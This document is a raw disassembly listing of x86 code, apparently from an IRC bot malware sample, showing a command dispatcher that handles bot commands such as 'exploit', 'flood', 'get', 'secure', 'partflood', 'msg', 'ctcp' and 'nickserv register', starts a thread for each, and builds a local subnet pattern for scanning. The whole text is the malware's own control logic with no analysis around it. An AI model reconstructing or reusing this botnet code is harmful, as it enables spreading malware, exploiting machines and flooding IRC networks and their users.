loc_4045E5: ; CODE XREF: sub_401ACD+1467�j
; sub_401ACD+147C�j
push [ebp+esi+var_8C]
push 24h
push offset dword_42BFF4
push offset dword_42BFE4
jmp loc_402B25
; ---------------------------------------------------------------------------
loc_4045FD: ; CODE XREF: sub_401ACD+1083�j
; sub_401ACD+1098�j
mov edi, [ebp+esi+var_8C]
cmp edi, ebx
jz short loc_40461C
push edi
call sub_41B779
test eax, eax
pop ecx
jz short loc_40461C
push edi
call sub_41B779
pop ecx
jmp short loc_404621
; ---------------------------------------------------------------------------
loc_40461C: ; CODE XREF: sub_401ACD+2B39�j
; sub_401ACD+2B44�j
mov eax, dword_429074
loc_404621: ; CODE XREF: sub_401ACD+2B4D�j
mov esi, [ebp+esi+var_88]
mov [ebp+var_590], eax
cmp esi, ebx
jz short loc_404646
push esi
loc_404633: ; CODE XREF: sub_401ACD+2B88�j
lea eax, [ebp+var_5A0]
push 10h
push eax
call sub_41B980
add esp, 0Ch
jmp short loc_40465D
; ---------------------------------------------------------------------------
loc_404646: ; CODE XREF: sub_401ACD+2B63�j
cmp [ebp+var_8FF], bl
jz short loc_404657
lea eax, [ebp+var_C4]
push eax
jmp short loc_404633
; ---------------------------------------------------------------------------
loc_404657: ; CODE XREF: sub_401ACD+2B7F�j
mov [ebp+var_5A0], bl
loc_40465D: ; CODE XREF: sub_401ACD+2B77�j
mov eax, [ebp+var_4]
push [ebp+var_88]
mov esi, [ebp+arg_4]
mov [ebp+var_584], eax
mov eax, [ebp+var_8]
push 80h
mov [ebp+var_580], eax
lea eax, [ebp+var_620]
push eax
mov [ebp+var_624], esi
call sub_41B980
add esp, 0Ch
push [ebp+var_590]
push esi
call sub_40AC10
pop ecx
push eax
lea eax, [ebp+var_2C4]
push offset dword_42BFBC
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_2C4]
push 19h
push eax
call sub_40B0F7
add esp, 1Ch
mov [ebp+var_58C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_624]
push ebx
push eax
push offset sub_4111CE
push ebx
push ebx
call dword_42707C ; CreateThread
mov ecx, [ebp+var_58C]
imul ecx, 234h
cmp eax, ebx
mov dword_43E5A4[ecx], eax
jz short loc_40470E
loc_4046F8: ; CODE XREF: sub_401ACD+2C3F�j
cmp [ebp+var_57C], ebx
jnz loc_401E94
push 32h
call dword_427078 ; Sleep
jmp short loc_4046F8
; ---------------------------------------------------------------------------
loc_40470E: ; CODE XREF: sub_401ACD+2C29�j
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset dword_42BF80
jmp loc_402077
; ---------------------------------------------------------------------------
loc_40471F: ; CODE XREF: sub_401ACD+1019�j
; sub_401ACD+102E�j
mov esi, [ebp+esi+var_8C]
cmp esi, ebx
jz short loc_40473F
push esi
call sub_41B779
test ax, ax
pop ecx
jz short loc_40473F
push esi
call sub_41B779
pop ecx
jmp short loc_404745
; ---------------------------------------------------------------------------
loc_40473F: ; CODE XREF: sub_401ACD+2C5B�j
; sub_401ACD+2C67�j
mov ax, word_429084
loc_404745: ; CODE XREF: sub_401ACD+2C70�j
push [ebp+var_88]
mov esi, [ebp+arg_4]
mov edi, [ebp+var_4]
mov [ebp+var_97C], ax
mov eax, [ebp+var_8]
push 80h
mov [ebp+var_96C], eax
lea eax, [ebp+var_9FC]
push eax
mov [ebp+var_A00], esi
mov [ebp+var_970], edi
call sub_41B980
movzx eax, [ebp+var_97C]
add esp, 0Ch
push eax
push esi
call sub_40AC10
pop ecx
push eax
lea eax, [ebp+var_2C4]
push offset unk_42BF54
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_2C4]
push edi
push eax
push [ebp+var_88]
push esi
call sub_409A73
push ebx
lea eax, [ebp+var_2C4]
push 6
push eax
call sub_40B0F7
add esp, 30h
mov [ebp+var_978], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_A00]
push ebx
push eax
push offset sub_40E504
push ebx
push ebx
call dword_42707C ; CreateThread
mov ecx, [ebp+var_978]
imul ecx, 234h
cmp eax, ebx
mov dword_43E5A4[ecx], eax
jz short loc_404814
loc_4047FE: ; CODE XREF: sub_401ACD+2D45�j
cmp [ebp+var_968], ebx
jnz loc_401E94
push 32h
call dword_427078 ; Sleep
jmp short loc_4047FE
; ---------------------------------------------------------------------------
loc_404814: ; CODE XREF: sub_401ACD+2D2F�j
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset unk_42BF14
jmp loc_402077
; ---------------------------------------------------------------------------
loc_404825: ; CODE XREF: sub_401ACD+FC5�j
; sub_401ACD+FDA�j ...
push edi
push offset aSecure ; "secure"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz short loc_40484D
push edi
push offset aSec ; "sec"
call sub_41C070
pop ecx
mov [ebp+var_A10], ebx
test eax, eax
pop ecx
jnz short loc_404857
loc_40484D: ; CODE XREF: sub_401ACD+2D67�j
mov [ebp+var_A10], 1
loc_404857: ; CODE XREF: sub_401ACD+2D7E�j
push [ebp+var_88]
lea eax, [ebp+var_A94]
push 80h
push eax
call sub_41B980
mov eax, [ebp+arg_4]
add esp, 0Ch
cmp [ebp+var_A10], ebx
mov [ebp+var_A98], eax
mov eax, [ebp+var_4]
mov [ebp+var_A0C], eax
mov eax, [ebp+var_8]
mov [ebp+var_A08], eax
mov eax, offset aSecuring ; "Securing"
jnz short loc_40489E
mov eax, offset aUnsecuring ; "Unsecuring"
loc_40489E: ; CODE XREF: sub_401ACD+2DCA�j
push eax
push offset dword_42BEE0
lea eax, [ebp+var_2C4]
push 200h
push eax
call sub_41B980
push ebx
lea eax, [ebp+var_2C4]
push 22h
push eax
call sub_40B0F7
add esp, 1Ch
mov [ebp+var_A14], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_A98]
push ebx
push eax
push offset sub_419E1A
push ebx
push ebx
call dword_42707C ; CreateThread
mov ecx, [ebp+var_A14]
imul ecx, 234h
cmp eax, ebx
mov dword_43E5A4[ecx], eax
jz short loc_404912
loc_4048FC: ; CODE XREF: sub_401ACD+2E43�j
cmp [ebp+var_A04], ebx
jnz loc_4083BD
push 32h
call dword_427078 ; Sleep
jmp short loc_4048FC
; ---------------------------------------------------------------------------
loc_404912: ; CODE XREF: sub_401ACD+2E2D�j
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset dword_42BEA4
jmp loc_4083AE
; ---------------------------------------------------------------------------
loc_404923: ; CODE XREF: sub_401ACD+F9B�j
; sub_401ACD+FB0�j
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_41A6AF
loc_404934: ; CODE XREF: sub_401ACD+2AB9�j
; sub_401ACD+2ACF�j ...
add esp, 0Ch
jmp loc_409855
; ---------------------------------------------------------------------------
loc_40493C: ; CODE XREF: sub_401ACD+F71�j
; sub_401ACD+F86�j
push offset unk_42BDF4
jmp loc_4085D6
; ---------------------------------------------------------------------------
loc_404946: ; CODE XREF: sub_401ACD+F47�j
; sub_401ACD+F5C�j
push offset aAbosel7Vs ; "abosel7 vs"
push offset dword_42BDE4
jmp loc_406CD0
; ---------------------------------------------------------------------------
loc_404955: ; CODE XREF: sub_401ACD+F1D�j
; sub_401ACD+F32�j
mov esi, [ebp+esi+var_8C]
cmp esi, ebx
jz short loc_4049AF
push esi
call sub_41B779
cmp eax, ebx
pop ecx
jl short loc_4049A7
cmp eax, 3
jge short loc_4049A7
mov edx, [ebp+arg_18]
mov ecx, eax
shl ecx, 7
cmp [ecx+edx], bl
lea esi, [ecx+edx]
jz short loc_40499F
lea eax, [esi+1]
push eax
lea eax, [ebp+var_2C4]
push offset unk_42D0B8
push eax
call sub_41B886
add esp, 0Ch
mov [esi], bl
jmp loc_40828C
; ---------------------------------------------------------------------------
loc_40499F: ; CODE XREF: sub_401ACD+2EB1�j
push eax
push offset unk_42BDB8
jmp short loc_4049EC
; ---------------------------------------------------------------------------
loc_4049A7: ; CODE XREF: sub_401ACD+2E9C�j
; sub_401ACD+2EA1�j
push eax
push offset unk_42BD8C
jmp short loc_4049EC
; ---------------------------------------------------------------------------
loc_4049AF: ; CODE XREF: sub_401ACD+2E91�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_4049B4: ; CODE XREF: sub_401ACD+2F03�j
push [ebp+var_90]
push edi
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz short loc_4049D7
inc esi
add edi, 80h
cmp esi, 3
jl short loc_4049B4
jmp loc_40828C
; ---------------------------------------------------------------------------
loc_4049D7: ; CODE XREF: sub_401ACD+2EF7�j
mov eax, [ebp+arg_18]
shl esi, 7
mov [esi+eax], bl
lea eax, [ebp+var_C4]
push eax
push offset unk_42D0B8
loc_4049EC: ; CODE XREF: sub_401ACD+2153�j
; sub_401ACD+2ED8�j ...
lea eax, [ebp+var_2C4]
push eax
call sub_41B886
jmp loc_408289
; ---------------------------------------------------------------------------
loc_4049FD: ; CODE XREF: sub_401ACD+EF3�j
; sub_401ACD+F08�j
push [ebp+var_8C]
push offset dword_42D02C
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4034A6
call sub_40B2C0
push ebx
call dword_427064 ; ExitProcess
loc_404A23: ; CODE XREF: sub_401ACD+1A12�j
push offset aGet ; "get"
push esi
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_404AB1
cmp ds:dword_4CEE08, ebx
jz short loc_404A4B
push offset dword_4CE7E8
loc_404A41: ; CODE XREF: sub_401ACD+2FE2�j
push offset unk_42BD50
jmp loc_404AE1
; ---------------------------------------------------------------------------
loc_404A4B: ; CODE XREF: sub_401ACD+2F6D�j
push 10h
pop eax
mov [ebp+var_2CC], eax
push eax
lea eax, [ebp+var_2E8]
push ebx
push eax
call sub_41B590
add esp, 0Ch
lea eax, [ebp+var_2CC]
push eax
lea eax, [ebp+var_2E8]
push eax
push [ebp+arg_4]
call dword_427230 ; getsockname
movzx eax, [ebp+var_2E2]
push eax
movzx eax, [ebp+var_2E3]
push eax
movzx eax, [ebp+var_2E4]
push eax
lea eax, [ebp+var_E30]
push offset aD_D_D_ ; "%d.%d.%d.*"
push eax
call sub_41B886
add esp, 14h
lea eax, [ebp+var_E30]
push eax
jmp short loc_404A41
; ---------------------------------------------------------------------------
loc_404AB1: ; CODE XREF: sub_401ACD+2F65�j
push esi
call ds:dword_4CB694 ; inet_addr
cmp eax, 0FFFFFFFFh
push esi
jnz short loc_404AC5
push offset unk_42BD10
jmp short loc_404AE1
; ---------------------------------------------------------------------------
loc_404AC5: ; CODE XREF: sub_401ACD+2FEF�j
push offset dword_4CE7E8
call sub_41BEB0
pop ecx
mov ds:dword_4CEE08, 1
pop ecx
push esi
push offset unk_42BCE4
loc_404AE1: ; CODE XREF: sub_401ACD+2F79�j
; sub_401ACD+2FF6�j
lea eax, [ebp+var_2C4]
push eax
call sub_41B886
add esp, 0Ch
jmp loc_4034FE
; ---------------------------------------------------------------------------
loc_404AF5: ; CODE XREF: sub_401ACD+19FA�j
push edi
push offset aExploit ; "exploit"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz loc_404BF8
mov eax, [ebp+var_4]
mov esi, offset aF ; "#f"
mov [ebp+var_13E4], eax
mov eax, [ebp+var_8]
mov [ebp+var_13E0], eax
mov eax, [ebp+arg_4]
mov [ebp+var_13F4], eax
mov edi, 80h
push esi
lea eax, [ebp+var_1474]
push edi
push eax
mov [ebp+var_13EC], 1
call sub_41B980
add esp, 0Ch
lea eax, [ebp+var_14F4]
push esi
push edi
push eax
call sub_41B980
add esp, 0Ch
lea eax, [ebp+var_1504]
push [ebp+arg_10]
push 10h
push eax
call sub_41B980
add esp, 0Ch
lea eax, [ebp+var_1504]
push eax
lea eax, [ebp+var_2C4]
push offset unk_42BCAC
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_2C4]
push 8
push eax
call sub_40B0F7
add esp, 18h
mov [ebp+var_13E8], eax
lea eax, [ebp+var_2FC]
push eax
lea eax, [ebp+var_1504]
push ebx
push eax
push offset sub_40B8A2
push ebx
push ebx
call dword_42707C ; CreateThread
mov ecx, [ebp+var_13E8]
imul ecx, 234h
cmp eax, ebx
mov dword_43E5A4[ecx], eax
jz short loc_404BE7
loc_404BD1: ; CODE XREF: sub_401ACD+3118�j
cmp [ebp+var_13DC], ebx
jnz loc_40828C
push 32h
call dword_427078 ; Sleep
jmp short loc_404BD1
; ---------------------------------------------------------------------------
loc_404BE7: ; CODE XREF: sub_401ACD+3102�j
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset unk_42BC6C
jmp loc_4049EC
; ---------------------------------------------------------------------------
loc_404BF8: ; CODE XREF: sub_401ACD+3037�j
push edi
push offset aReconnect_in ; "reconnect.in"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4097C1
push edi
push offset aRin ; "rin"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_4097C1
push edi
push offset aReconnect_in_m ; "reconnect.in.ms"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_409779
push edi
push offset aRinms ; "rinms"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_409779
push [ebp+arg_8]
push offset aFlood ; "flood"
call sub_41C070
mov edi, dword_427078
pop ecx
test eax, eax
pop ecx
jnz loc_4057DF
call dword_4270A8 ; GetTickCount
push eax
call sub_41B8D8
push [ebp+arg_10]
push offset aLoad ; "load"
call sub_41C070
add esp, 0Ch
test eax, eax
jnz short loc_404CFE
cmp [ebp+esi+var_80], ebx
jz short loc_404CFE
push [ebp+esi+var_80]
call sub_41B779
pop ecx
push eax
push [ebp+esi+var_84]
call sub_41B779
pop ecx
push eax
push [ebp+esi+var_88]
call sub_417A60
add esp, 0Ch
lea eax, [ebp+var_2C4]
push [ebp+esi+var_84]
push [ebp+esi+var_88]
push [ebp+esi+var_80]
push offset unk_42BC04
push eax
call sub_41B886
add esp, 14h
cmp [ebp+var_8], ebx
jnz short loc_404CFE
push ebx
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409A73
add esp, 14h
loc_404CFE: ; CODE XREF: sub_401ACD+31BA�j
; sub_401ACD+31C0�j ...
push [ebp+arg_10]
push offset dword_42BC00
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_404D6A
mov eax, [ebp+esi+var_84]
cmp eax, ebx
jz short loc_404D6A
push offset asc_42D128 ; " "
push offset dword_42BBFC
push eax
call sub_417EEF
push eax
lea eax, [ebp+var_50F4]
push eax
call sub_41BEB0
add esp, 14h
lea eax, [ebp+var_50F4]
push eax
lea eax, [ebp+var_2C4]
push [ebp+esi+var_88]
push offset dword_42BBEC
push eax
call sub_41B886
lea eax, [ebp+var_2C4]
push eax
call sub_417789
add esp, 14h
loc_404D6A: ; CODE XREF: sub_401ACD+3242�j
; sub_401ACD+324D�j
push [ebp+arg_10]
push offset dword_42BBE8
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_404DD6
mov eax, [ebp+esi+var_84]
cmp eax, ebx
jz short loc_404DD6
push offset asc_42D128 ; " "
push offset dword_42BBFC
push eax
call sub_417EEF
push eax
lea eax, [ebp+var_4BF0]
push eax
call sub_41BEB0
add esp, 14h
lea eax, [ebp+var_4BF0]
push eax
lea eax, [ebp+var_2C4]
push [ebp+esi+var_88]
push offset dword_42BBD4
push eax
call sub_41B886
lea eax, [ebp+var_2C4]
push eax
call sub_417789
add esp, 14h
loc_404DD6: ; CODE XREF: sub_401ACD+32AE�j
; sub_401ACD+32B9�j
push [ebp+arg_10]
push offset aNt ; "nt"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_404E42
mov eax, [ebp+esi+var_84]
cmp eax, ebx
jz short loc_404E42
push offset asc_42D128 ; " "
push offset dword_42BBFC
push eax
call sub_417EEF
push eax
lea eax, [ebp+var_46EC]
push eax
call sub_41BEB0
add esp, 14h
lea eax, [ebp+var_46EC]
push eax
lea eax, [ebp+var_2C4]
push [ebp+esi+var_88]
push offset aNoticeSS_1 ; "notice %s :%s"
push eax
call sub_41B886
lea eax, [ebp+var_2C4]
push eax
call sub_417789
add esp, 14h
loc_404E42: ; CODE XREF: sub_401ACD+331A�j
; sub_401ACD+3325�j
push [ebp+arg_10]
push offset aMode ; "mode"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_404EAE
mov eax, [ebp+esi+var_84]
cmp eax, ebx
jz short loc_404EAE
push offset asc_42D128 ; " "
push offset dword_42BBFC
push eax
call sub_417EEF
push eax
lea eax, [ebp+var_4DF0]
push eax
call sub_41BEB0
add esp, 14h
lea eax, [ebp+var_4DF0]
push eax
lea eax, [ebp+var_2C4]
push [ebp+esi+var_88]
push offset aModeSS ; "mode %s %s"
push eax
call sub_41B886
lea eax, [ebp+var_2C4]
push eax
call sub_417789
add esp, 14h
loc_404EAE: ; CODE XREF: sub_401ACD+3386�j
; sub_401ACD+3391�j
push [ebp+arg_10]
push offset aJoin ; "join"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_404EED
mov eax, [ebp+esi+var_88]
cmp eax, ebx
jz short loc_404EED
push eax
lea eax, [ebp+var_2C4]
push offset aJoinS ; "join %s"
push eax
call sub_41B886
lea eax, [ebp+var_2C4]
push eax
call sub_417789
add esp, 10h
loc_404EED: ; CODE XREF: sub_401ACD+33F2�j
; sub_401ACD+33FD�j
push [ebp+arg_10]
push offset aPart_0 ; "part"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_404F2C
mov eax, [ebp+esi+var_88]
cmp eax, ebx
jz short loc_404F2C
push eax
lea eax, [ebp+var_2C4]
push offset aPartS ; "part %s"
push eax
call sub_41B886
lea eax, [ebp+var_2C4]
push eax
call sub_417789
add esp, 10h
loc_404F2C: ; CODE XREF: sub_401ACD+3431�j
; sub_401ACD+343C�j
push [ebp+arg_10]
push offset aPartflood ; "partflood"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_404F70
mov eax, [ebp+esi+var_88]
cmp eax, ebx
jz short loc_404F70
push offset dword_427638
push eax
lea eax, [ebp+var_2C4]
push offset aPartSS ; "part %s %s"
push eax
call sub_41B886
lea eax, [ebp+var_2C4]
push eax
call sub_417789
add esp, 14h
loc_404F70: ; CODE XREF: sub_401ACD+3470�j
; sub_401ACD+347B�j
push [ebp+arg_10]
push offset aPnick ; "pnick"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_404FE9
cmp [ebp+esi+var_88], ebx
jz short loc_404FE9
call dword_4270A8 ; GetTickCount
push eax
call sub_41B8D8
pop ecx
call sub_41B8E2
cdq
mov ecx, 0F423Fh
idiv ecx
lea eax, [ebp+var_17B4]
push edx
push [ebp+esi+var_88]
push offset dword_42BB64
push eax
call sub_41B886
add esp, 10h
lea eax, [ebp+var_17B4]
push eax
lea eax, [ebp+var_2C4]
push offset dword_42BB5C
push eax
call sub_41B886
lea eax, [ebp+var_2C4]
push eax
call sub_417789
add esp, 10h
loc_404FE9: ; CODE XREF: sub_401ACD+34B4�j
; sub_401ACD+34BD�j
push [ebp+arg_10]
push offset dword_42BB50
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz loc_405136
cmp [ebp+esi+var_88], ebx
jz loc_405136
push [ebp+esi+var_88]
lea eax, [ebp+var_2C4]
push offset aJoinS ; "join %s"
push eax
call sub_41B886
lea eax, [ebp+var_2C4]
push eax
call sub_417789
add esp, 10h
lea eax, [ebp+var_2C4]
push offset dword_427638
push [ebp+esi+var_88]
push offset aPartSS ; "part %s %s"
push eax
call sub_41B886
lea eax, [ebp+var_2C4]
push eax
call sub_417789
add esp, 14h
call sub_41B8E2
cdq
mov ecx, 3E8h
idiv ecx
push edx
call edi ; Sleep
push [ebp+esi+var_88]
lea eax, [ebp+var_2C4]
push offset aJoinS ; "join %s"
push eax
call sub_41B886
lea eax, [ebp+var_2C4]
push eax
call sub_417789
add esp, 10h
call sub_41B8E2
cdq
mov ecx, 384h
idiv ecx
push edx
call edi ; Sleep
push offset dword_427638
lea eax, [ebp+var_2C4]
push [ebp+esi+var_88]
push offset aPartSS ; "part %s %s"
push eax
call sub_41B886
lea eax, [ebp+var_2C4]
push eax
call sub_417789
add esp, 14h
lea eax, [ebp+var_2C4]
push [ebp+esi+var_88]
push offset aJoinS ; "join %s"
push eax
call sub_41B886
lea eax, [ebp+var_2C4]
push eax
call sub_417789
add esp, 10h
call sub_41B8E2
cdq
mov ecx, 0C8h
idiv ecx
push edx
call edi ; Sleep
push offset dword_427638
lea eax, [ebp+var_2C4]
push [ebp+esi+var_88]
push offset aPartSS ; "part %s %s"
push eax
call sub_41B886
lea eax, [ebp+var_2C4]
push eax
call sub_417789
add esp, 14h
loc_405136: ; CODE XREF: sub_401ACD+352D�j
; sub_401ACD+353A�j
push [ebp+arg_10]
push offset dword_42BB4C
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz loc_4051D0
cmp [ebp+esi+var_88], ebx
jz short loc_4051D0
call dword_4270A8 ; GetTickCount
push eax
call sub_41B8D8
pop ecx
call sub_41B8E2
cdq
mov ecx, 0F423Fh
idiv ecx
push edx
call sub_41B8E2
cdq
mov ecx, 0F423Fh
idiv ecx
push edx
call sub_41B8E2
cdq
mov ecx, 0F423Fh
idiv ecx
push edx
call sub_41B8E2
cdq
mov ecx, 0F423Fh
idiv ecx
push edx
call sub_41B8E2
cdq
mov ecx, 0F423Fh
idiv ecx
lea eax, [ebp+var_2C4]
push edx
push [ebp+esi+var_88]
push offset dword_42BB24
push eax
call sub_41B886
lea eax, [ebp+var_2C4]
push eax
call sub_417789
add esp, 24h
loc_4051D0: ; CODE XREF: sub_401ACD+367A�j
; sub_401ACD+3687�j
push [ebp+arg_10]
push offset aNick_0 ; "nick"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz loc_4052D2
mov eax, [ebp+esi+var_88]
cmp eax, ebx
jz loc_4052D2
push eax
lea eax, [ebp+var_2C4]
push offset aJoinS ; "join %s"
push eax
call sub_41B886
lea eax, [ebp+var_2C4]
push eax
call sub_417789
lea eax, [ebp+var_4BC]
push eax
call sub_417ADE
add esp, 14h
lea eax, [ebp+var_4BC]
push eax
lea eax, [ebp+var_2C4]
push offset dword_42BB5C
push eax
call sub_41B886
lea eax, [ebp+var_2C4]
push eax
call sub_417789
add esp, 10h
call sub_41B8E2
cdq
mov ecx, 514h
idiv ecx
push edx
call edi ; Sleep
lea eax, [ebp+var_4BC]
push eax
call sub_417ADE
pop ecx
lea eax, [ebp+var_4BC]
push eax
lea eax, [ebp+var_2C4]
push offset dword_42BB5C
push eax
call sub_41B886
lea eax, [ebp+var_2C4]
push eax
call sub_417789
add esp, 10h
call sub_41B8E2
cdq
mov ecx, 1F4h
idiv ecx
push edx
call edi ; Sleep
lea eax, [ebp+var_4BC]
push eax
call sub_417ADE
pop ecx
lea eax, [ebp+var_4BC]
push eax
lea eax, [ebp+var_2C4]
push offset dword_42BB5C
push eax
call sub_41B886
lea eax, [ebp+var_2C4]
push eax
call sub_417789
add esp, 10h
loc_4052D2: ; CODE XREF: sub_401ACD+3714�j
; sub_401ACD+3723�j
push [ebp+arg_10]
push offset aChgnick ; "chgnick"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_405319
lea eax, [ebp+var_1808]
push eax
call sub_417ADE
pop ecx
lea eax, [ebp+var_1808]
push eax
lea eax, [ebp+var_2C4]
push offset dword_42BB5C
push eax
call sub_41B886
lea eax, [ebp+var_2C4]
push eax
call sub_417789
add esp, 10h
loc_405319: ; CODE XREF: sub_401ACD+3816�j
push [ebp+arg_10]
push offset aMsg ; "msg"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz loc_405408
cmp [ebp+esi+var_88], ebx
jz loc_405408
push [ebp+esi+var_88]
lea eax, [ebp+var_2C4]
push offset aJoinS ; "join %s"
push eax
call sub_41B886
lea eax, [ebp+var_2C4]
push eax
call sub_417789
add esp, 10h
lea eax, [ebp+var_2C4]
push offset dword_42763C
push [ebp+esi+var_88]
push offset dword_42BBEC
push eax
call sub_41B886
lea eax, [ebp+var_2C4]
push eax
call sub_417789
add esp, 14h
call sub_41B8E2
cdq
mov ecx, 3E8h
idiv ecx
push edx
call edi ; Sleep
push offset dword_42763C
lea eax, [ebp+var_2C4]
push [ebp+esi+var_88]
push offset dword_42BBEC
push eax
call sub_41B886
lea eax, [ebp+var_2C4]
push eax
call sub_417789
add esp, 14h
call sub_41B8E2
cdq
mov ecx, 384h
idiv ecx
push edx
call edi ; Sleep
push offset dword_42763C
lea eax, [ebp+var_2C4]
push [ebp+esi+var_88]
push offset dword_42BBEC
push eax
call sub_41B886
lea eax, [ebp+var_2C4]
push eax
call sub_417789
add esp, 14h
loc_405408: ; CODE XREF: sub_401ACD+385D�j
; sub_401ACD+386A�j
push [ebp+arg_10]
push offset aNotice_0 ; "notice"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz loc_4054F7
cmp [ebp+esi+var_88], ebx
jz loc_4054F7
push [ebp+esi+var_88]
lea eax, [ebp+var_2C4]
push offset aJoinS ; "join %s"
push eax
call sub_41B886
lea eax, [ebp+var_2C4]
push eax
call sub_417789
add esp, 10h
lea eax, [ebp+var_2C4]
push offset dword_42763C
push [ebp+esi+var_88]
push offset aNoticeSS_0 ; "NOTICE %s :%s"
push eax
call sub_41B886
lea eax, [ebp+var_2C4]
push eax
call sub_417789
add esp, 14h
call sub_41B8E2
cdq
mov ecx, 3E8h
idiv ecx
push edx
call edi ; Sleep
push offset dword_42763C
lea eax, [ebp+var_2C4]
push [ebp+esi+var_88]
push offset aNoticeSS_0 ; "NOTICE %s :%s"
push eax
call sub_41B886
lea eax, [ebp+var_2C4]
push eax
call sub_417789
add esp, 14h
call sub_41B8E2
cdq
mov ecx, 384h
idiv ecx
push edx
call edi ; Sleep
push offset dword_42763C
lea eax, [ebp+var_2C4]
push [ebp+esi+var_88]
push offset aNoticeSS_0 ; "NOTICE %s :%s"
push eax
call sub_41B886
lea eax, [ebp+var_2C4]
push eax
call sub_417789
add esp, 14h
loc_4054F7: ; CODE XREF: sub_401ACD+394C�j
; sub_401ACD+3959�j
push [ebp+arg_10]
push offset aCtcp ; "ctcp"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz loc_40560E
cmp [ebp+esi+var_88], ebx
jz loc_40560E
push [ebp+esi+var_88]
lea eax, [ebp+var_2C4]
push offset aJoinS ; "join %s"
push eax
call sub_41B886
lea eax, [ebp+var_2C4]
push eax
call sub_417789
add esp, 10h
lea eax, [ebp+var_2C4]
push [ebp+esi+var_88]
push offset dword_42BADC
push eax
call sub_41B886
lea eax, [ebp+var_2C4]
push eax
call sub_417789
add esp, 10h
call sub_41B8E2
cdq
mov ecx, 514h
idiv ecx
push edx
call edi ; Sleep
push [ebp+esi+var_88]
lea eax, [ebp+var_2C4]
push offset dword_42BAC4
push eax
call sub_41B886
lea eax, [ebp+var_2C4]
push eax
call sub_417789
add esp, 10h
call sub_41B8E2
cdq
mov ecx, 514h
idiv ecx
push edx
call edi ; Sleep
push [ebp+esi+var_88]
lea eax, [ebp+var_2C4]
push offset dword_42BAAC
push eax
call sub_41B886
lea eax, [ebp+var_2C4]
push eax
call sub_417789
add esp, 10h
call sub_41B8E2
cdq
mov ecx, 514h
idiv ecx
push edx
call edi ; Sleep
push [ebp+esi+var_88]
lea eax, [ebp+var_2C4]
push offset dword_42BAAC
push eax
call sub_41B886
lea eax, [ebp+var_2C4]
push eax
call sub_417789
add esp, 10h
loc_40560E: ; CODE XREF: sub_401ACD+3A3B�j
; sub_401ACD+3A48�j
push [ebp+arg_10]
push offset aMix ; "mix"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz loc_405734
cmp [ebp+esi+var_88], ebx
jz loc_405734
push [ebp+esi+var_88]
lea eax, [ebp+var_2C4]
push offset aJoinS ; "join %s"
push eax
call sub_41B886
lea eax, [ebp+var_2C4]
push eax
call sub_417789
add esp, 10h
lea eax, [ebp+var_2C4]
push [ebp+esi+var_88]
push offset dword_42BADC
push eax
call sub_41B886
lea eax, [ebp+var_2C4]
push eax
call sub_417789
add esp, 10h
call sub_41B8E2
cdq
mov ecx, 514h
idiv ecx
push edx
call edi ; Sleep
push offset dword_42763C
lea eax, [ebp+var_2C4]
push [ebp+esi+var_88]
push offset aNoticeSS_0 ; "NOTICE %s :%s"
push eax
call sub_41B886
lea eax, [ebp+var_2C4]
push eax
call sub_417789
add esp, 14h
call sub_41B8E2
cdq
mov ecx, 514h
idiv ecx
push edx
call edi ; Sleep
push offset dword_42763C
lea eax, [ebp+var_2C4]
push [ebp+esi+var_88]
push offset aPrivmsgSS_0 ; "PRIVMSG %s :%s"
push eax
call sub_41B886
lea eax, [ebp+var_2C4]
push eax
call sub_417789
add esp, 14h
call sub_41B8E2
cdq
mov ecx, 514h
idiv ecx
push edx
call edi ; Sleep
push offset dword_42763C
lea eax, [ebp+var_2C4]
push [ebp+esi+var_88]
push offset aNoticeSS_0 ; "NOTICE %s :%s"
push eax
call sub_41B886
lea eax, [ebp+var_2C4]
push eax
call sub_417789
add esp, 14h
loc_405734: ; CODE XREF: sub_401ACD+3B52�j
; sub_401ACD+3B5F�j
push [ebp+arg_10]
push offset aRegister ; "register"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_40577A
mov eax, [ebp+esi+var_84]
cmp eax, ebx
jz short loc_40577A
push eax
lea eax, [ebp+var_2C4]
push [ebp+esi+var_88]
push offset aNickservRegist ; "nickserv register %s %s"
push eax
call sub_41B886
lea eax, [ebp+var_2C4]
push eax
call sub_417789
add esp, 14h
loc_40577A: ; CODE XREF: sub_401ACD+3C78�j
; sub_401ACD+3C83�j
push [ebp+arg_10]
push offset aOff ; "off"
